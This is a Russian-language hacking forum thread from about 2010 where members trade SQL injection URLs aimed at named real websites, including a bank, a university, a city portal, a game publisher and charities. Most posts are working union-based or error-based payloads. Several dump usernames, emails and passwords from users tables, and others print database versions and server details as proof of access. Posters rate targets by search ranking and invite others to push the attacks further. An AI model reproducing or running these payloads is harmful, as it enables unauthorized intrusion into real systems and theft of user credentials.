SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. DeepBlue7

    DeepBlue7 Elder - Старейшина

    Joined:
    2 Jan 2009
    Messages:
    359
    Likes Received:
    50
    Reputations:
    12
    PR 3

    Code:
    http://www.latmet.lv/view.php?num=1+and+1=0+union+select+1,2,3,4,5,6,concat_ws(0x2f,user(),version(),database())--
    latmet@localhost/5.1.36-community-log/ngs
     
  2. totenkopf

    totenkopf Elder - Старейшина

    Joined:
    19 Jul 2010
    Messages:
    92
    Likes Received:
    64
    Reputations:
    19
    http://www.grotec.co.uk/grotec_hydroponics_help_and_advice.php?helpID=-27+UNION+SELECT+1,2+--+
    grotecdb@localhost:5.0.51a-3ubuntu5.8:grotecdb:debian-linux-gnu
     
  3. Linkus

    Linkus Member

    Joined:
    20 Dec 2008
    Messages:
    168
    Likes Received:
    15
    Reputations:
    -1
    Code:
    http://www.flop.ru/product.php?id=-73%27+UNION+SELECT+1,group_concat%28column_name%29,3,concat_ws%280x3a3a,database%28%29,user%28%29,version%28%29,@@version_compile_os%29,5,6,7,8+FROM+INFORMATION_SCHEMA.COLUMNS+where+table_name=char%2897,117,116,104,114,101,103%29+--+
    Code:
    http://www.acousticstorm.com/interview.php?id=-73%27+UNION+SELECT+1,2,3,4,5,6,group_concat%28concat_ws%280x3a3a,username,password,isAdmin%29%29+from+users+--+
    А

    Code:
    http://www.meachamrifles.com/page.php?id=-73%27+UNION+SELECT+1,2,3,4,group_concat%28column_name%29,6,7+from+information_schema.columns+where+table_name=%27users%27+--+
    http://www.meachamrifles.com/info.php
    ТИЦ: 10
    PR: 2

    /обсуждения в пм =\

    p.s. если кто докрутит, отпишитесь :) интересно жэ

    //
    meachamrifles - Боян

    http://www.hackforums.net/showthread.php?tid=100011
     
    #13383 Linkus, 25 Nov 2010
    Last edited by a moderator: 26 Nov 2010
  4. Koren

    Koren Member

    Joined:
    11 Jul 2009
    Messages:
    66
    Likes Received:
    20
    Reputations:
    1
    BANK
    http://www.bakhtarbank.com/subpage.php?id=-15+/*!UnIoN+SeLeCt*/+group_cOnCaT(tAblE_naMe)+from+information_schema.%60tables%60+WHERE+TabLE_SCHEma=0x626b626b6162756c5f626b626462--
     
    2 people like this.
  5. BaleHoK

    BaleHoK Elder - Старейшина

    Joined:
    30 Sep 2007
    Messages:
    399
    Likes Received:
    21
    Reputations:
    10
    www.muenchen.de/service/branchenbuch/?s:bid=1262&s:eek:id=21179+or(1,2)=(select+count(*),concat((select+'asa'+from+information_schema.tables+limit+0,1),0x3a,floor(rand()*2))+from+information_schema.tables+group+by+2+limit+0,1)--+

    5-ка


    Немцы :)...топовый :)
     
    #13385 BaleHoK, 26 Nov 2010
    Last edited: 26 Nov 2010
  6. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://www.research.ucdavis.edu/iuc/print.cfm?id=iuc,20,1764,1768+and+1=@@version

    Microsoft SQL Server 2000 - 8.00.2055 (Intel X86)
    Dec 16 2008 19:46:53
    Copyright (c) 1988-2003 Microsoft Corporation
    Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
     
    _________________________
    2 people like this.
  7. MastaBass1

    MastaBass1 Member

    Joined:
    25 Dec 2009
    Messages:
    61
    Likes Received:
    13
    Reputations:
    2
    Rockstargames!

    http://www.rockstargames.com/classics/?id=2+and+1=0+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9
    Яндекс тИЦ (CY) 650
    Google PageRank (PR) 6
    Alexa Rank 7,293 +2,380
     
    7 people like this.
  8. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://www.artamonovguber.ru/nakaz.php?mo=5+and+1=(select+first+1+distinct+rdb$relation_name+from+rdb$relations+where+rdb$system_flag=0)--
     
    _________________________
    1 person likes this.
  9. BlackSite

    BlackSite Banned

    Joined:
    6 Feb 2009
    Messages:
    148
    Likes Received:
    100
    Reputations:
    0
    http://website.ptmd.nl/website.php?id=15-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11--

    Host IP: 85.17.96.210
    Web Server: Apache/2
    Powered-by: PHP/5.2.14
     
  10. Uex Urgent

    Uex Urgent Злостный Смайлик

    Joined:
    6 Feb 2009
    Messages:
    236
    Likes Received:
    463
    Reputations:
    452
    http://www.unificado.com.br/novo/med/see.php?id=-87+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7+--
     
    _________________________
  11. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://www.snapcharity.org/content.php?pg=2&gid=462&cont=471+and+1=0+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,login,password),9,10,11,12,13,14,15,16,17,18+from+users--
     
    _________________________
    1 person likes this.
  12. fl00der

    fl00der Moderator

    Joined:
    17 Dec 2008
    Messages:
    1,026
    Likes Received:
    311
    Reputations:
    86
    Вот вам нах, вроде не боян. Выводит красиво, но толку мало, сайт какой-то тупой:
    http://www.*moker*guide.com/*g/*moker*Guide/popup_ha*h_weed.php?id=-427+UNION+*ELECT+1,2,3,4,5,6,7,ver*ion(),databa*e(),u*er(),11,12,13,14,15
    Меняем * на s и радуемся.
     
    _________________________
  13. moodoone

    moodoone Member

    Joined:
    21 Oct 2009
    Messages:
    144
    Likes Received:
    38
    Reputations:
    5
    Code:
    http://www.originalstyle.com.ua/index.php?w=collections2&id=-1+union+select+1,version%28%29--
    Code:
    http://www.pro-school.com.ua/index.php?w=new&id=-577+union+select+1,2,3,4,5,version%28%29,7+--+
    Code:
    http://pro-kiev.com.ua/index.php?w=day&id=-511+union+select+1,2,3,version%28%29+--+
     
  14. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://www.fourcty.org/news.php?id=39+or+(1,1)=(select+count(0),concat((select+version()+from+information_schema.tables+limit+0,1),floor(rand(0)*2))from(information_schema.tables)+group+by+2)--+&p=7
     
    _________________________
    1 person likes this.
  15. bloodAngel

    bloodAngel Banned

    Joined:
    29 Jun 2007
    Messages:
    22
    Likes Received:
    25
    Reputations:
    -1
    Code:
    http://www.rusmg.ru/php/contents.php?id=3824+and+substring(version(),1,1)=5
    ))) ТИЦ 375
     
    3 people like this.
  16. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://www.holybiblesays.org/articles.php?ID=165+and+1=0+union(select+1,2,version(),4,5+from+information_schema.`tables`)
    -------
    http://www.textileinsight.com/articles.php?id=508'+and+1=0+union+select+1,2,3,4,5,6,7,group_concat(email,0x3a,password),9,10,11,12+from+users--+
    --------
    http://www.hackensackriverkeeper.org/Articles.php?ID=123+and+1=0+union+select+1,2,3,4,5,6,7,8,version(),10,11
    --------
    http://real-press.com/articles.php?id=81+and+1=2+union+select+1,2,3,4,5,6,7,concat(login,char(58),password)+from+users_cp
    --------
    http://www.gridironstrategies.com/articles.php?id=28+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,group_concat(email,char(58),password),48,49,50,51,52,53,54,55,56,57,58+from+gs_users--
    -------
    http://www.runninginsight.com/articles.php?id=130'++and+1=0+union+select+1,2,3,4,5,6,7,group_concat(email,0x3a,password),9,10,11,12+from+users--+
     
    _________________________
    #13396 Konqi, 30 Nov 2010
    Last edited: 30 Nov 2010
    3 people like this.
  17. nemaniak

    nemaniak Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    195
    Likes Received:
    161
    Reputations:
    108
    www.the-numbers.com PR-4 ТИЦ-50

    Code:
    http://www.the-numbers.com/interactive/newsStory.php?newsID=-1656+union+select+1,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+--+
    Code:
    5.0.45:thenumbers_main@localhost:thenumbers_main
    www.mcc.commnet.edu PR-6

    Code:
    http://www.mcc.commnet.edu/newsView.php?newsID=-547+union+select+concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,2,3,4,5,6,7,8,9,0,11+--+
    Code:
    4.1.22:macmcc@localhost:mcc
     
    4 people like this.
  18. TreV@N

    TreV@N Elder - Старейшина

    Joined:
    14 Jul 2008
    Messages:
    135
    Likes Received:
    48
    Reputations:
    19
    http://opekaweb.ru/news.php?ocd=view&id=18'+or+(1,1)=(select+count(0),concat((select+concat(username,0x3a,passwd)+from+members+limit+0,1),floor(rand(0)*2))+from+(information_schema.tables)+group+by+2)+--+'
     
  19. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,170
    Likes Received:
    1,155
    Reputations:
    202
    Code:
    http://www.diebold-russia.ru/about/index.php?pmenu=1&ac=3&id=-5+UNION+SELECT+1,2,3,4,5,6--
    diebold фирма производитель банкоматов.
     
    1 person likes this.
  20. moodoone

    moodoone Member

    Joined:
    21 Oct 2009
    Messages:
    144
    Likes Received:
    38
    Reputations:
    5
    Code:
    http://boolean.org.ua/index.php?a=-7+union+select+1,concat_ws%280x3a,username,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+jos_users--+
    Code:
    http://interatletika.cv.ua/product.php?a=10&id_categ=-34+union+select+1,version%28%29,3--
    Code:
    http://www.r-avto.kiev.ua/view_items.php?catid=-17+union+select+1,version%28%29,3--
     
    #13400 moodoone, 2 Dec 2010
    Last edited: 2 Dec 2010
    1 person likes this.
Thread Status:
Not open for further replies.